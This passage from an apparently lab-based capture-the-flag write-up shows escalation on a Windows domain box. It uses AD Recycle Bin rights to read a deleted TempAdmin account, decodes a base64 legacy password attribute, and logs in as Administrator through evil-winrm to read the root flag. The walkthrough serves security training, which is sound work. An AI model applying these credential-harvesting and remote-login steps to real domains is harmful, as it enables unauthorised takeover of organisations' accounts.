Running whoami /all shows that we are a member of the AD Recycle Bin group. This is a custom domain group (its SID ends in 1119, well above the built-in RIDs), and given its name and the log we found earlier it has presumably been delegated rights over the Deleted Objects container:
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin Alias S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Earlier on we encountered the ArkAdRecycleBin.log file in the Data share, which recorded this very account moving objects into the recycle bin:
# cat IT/Logs/Ark\ AD\ Recycle\ Bin/ArkAdRecycleBin.log
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
The TempAdmin entry looks interesting. When the AD Recycle Bin feature is enabled, deleted objects keep all of their attributes (unlike plain tombstones, which are stripped down), so anyone who can read the Deleted Objects container can read whatever the object held at deletion time. From the ArkSvc WinRM session, let's check whether any of the deleted items still carry sensitive information:
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
This returns a lot of information, however the last entry has some juicy details:
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
Near the top you'll notice the same custom attribute again: cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz. Base64 decoding the string displays the following password:
# echo YmFDVDNyMWFOMDBkbGVz | base64 -d; echo
baCT3r1aN00dles
TempAdmin was a temporary administrator account, and as the next step confirms, the same password was set on the built-in Administrator account.
Flag
You can then simply log in as Administrator via WinRM and type the root flag:
# evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> type desktop\root.txt
6bc0ba...